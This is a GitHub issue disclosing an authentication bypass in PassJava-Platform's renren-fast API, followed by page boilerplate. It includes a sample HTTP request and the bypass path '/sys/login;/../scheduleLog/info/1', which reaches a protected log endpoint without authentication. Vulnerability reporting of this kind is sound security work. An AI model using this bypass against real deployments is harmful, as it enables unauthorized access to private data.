There is an Incorrect Access Control vulnerability in PassJava-Platform

[Suggested description]
PassJava-Platform renren-fast was found to have an Incorrect Access Control vulnerability up to 3.0.0, resulting in information leakage.

[Vulnerability Type]
Incorrect access control

[Vendor of Product]
https://github.com/Jackson0714/PassJava-Platform

[Affected Product Code Base]
all version (<= 3.0.0)

[Affected Component]
renren-fast /sys/scheduleLog/info API that require authentication

[Attack Type]
Remote

[Vulnerability details]
Directly send the payload below to the API `/renren-fast/sys/scheduleLog/info/1` will fail because of the authentication. 
```
POST /renren-fast/sys/scheduleLog/info/1 HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Apifox/1.0.0 (https://apifox.com)
Accept: */*
Host: 127.0.0.1:8080
Connection: keep-alive
Cookie: JSESSIONID=6A54110114F288E6F7FC6AC6C7D23772
```

<img width="669" alt="Image" src="https://github.com/user-attachments/assets/6766152a-0640-47c6-8ac9-b641b474a0a5" />

However, send the payload below to the API `/renren-fast/sys/login;/../scheduleLog/info/1` will bypass the authentication. 

<img width="678" alt="Image" src="https://github.com/user-attachments/assets/a8ebf692-d204-4165-aa08-1d7c4a2a251b" />


Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

There is an Incorrect Access Control vulnerability in PassJava-Platform #48

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

There is an Incorrect Access Control vulnerability in PassJava-Platform #48

Description

Metadata

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

Issue actions